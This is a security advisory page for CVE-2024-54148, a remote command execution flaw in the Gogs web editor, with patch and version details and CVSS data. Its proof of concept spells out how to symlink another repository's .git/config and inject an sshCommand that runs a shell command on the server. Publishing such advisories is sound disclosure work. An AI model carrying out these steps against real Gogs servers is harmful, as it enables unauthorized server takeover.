Ecosyste.ms: Advisories

Security Advisories: GSA_kwCzR0hTQS1yN2o4LTVoOWMtZjZmeM4ABCrM

Remote Command Execution in file editing in gogs

Impact

The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server.

Patches

Editing symlink while changing the file name has been prohibited via the repository web editor (https://github.com/gogs/gogs/pull/7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.

References

n/a

Proof of Concept

1. Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.

2. In the second repository, create a symbolic link to the file you need to edit:

   $ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test
   $ ls -la
   total 8
   drwxr-xr-x   5 dd  staff  160 Oct 27 19:09 .
   drwxr-xr-x   4 dd  staff  128 Oct 27 19:06 ..
   drwxr-xr-x  12 dd  staff  384 Oct 27 19:09 .git
   -rw-r--r--   1 dd  staff   12 Oct 27 19:06 README.md
   lrwxr-xr-x   1 dd  staff   44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config
   $ git add .
   $ git commit -m 'ddd'
   $ git push -f
   

3. Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed)

   [core]
   repositoryformatversion = 0
   filemode = true
   bare = false
   logallrefupdates = true
   ignorecase = true
   precomposeunicode = true
   sshCommand = echo pwnned > /tmp/poc
   [remote "origin"]
   url = [[email protected]](mailto:[email protected]):torvalds/linux.git
   fetch = +refs/heads/*:refs/remotes/origin/*
   [branch "master"]
   remote = origin
   merge = refs/heads/master
   

4. Go back to the first repo, edit something, and commit again, you can notice a file called /tmp/poc created on the server.

For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

Permalink: https://github.com/advisories/GHSA-r7j8-5h9c-f6fx
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yN2o4LTVoOWMtZjZmeM4ABCrM
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 month ago
Updated: 28 days ago

CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS Percentage: 0.00045
EPSS Percentile: 0.17541

Identifiers: GHSA-r7j8-5h9c-f6fx, CVE-2024-54148
References:

• https://github.com/gogs/gogs/security/advisories/GHSA-r7j8-5h9c-f6fx
• https://nvd.nist.gov/vuln/detail/CVE-2024-54148
• https://github.com/gogs/gogs/issues/7582
• https://github.com/gogs/gogs/pull/7857
• https://github.com/gogs/gogs/commit/c94baec9ca923f38c19f0c7c5af722b9ec04022a
• https://github.com/advisories/GHSA-r7j8-5h9c-f6fx

Repository: https://github.com/gogs/gogs
Blast Radius: 0.0

Affected Packages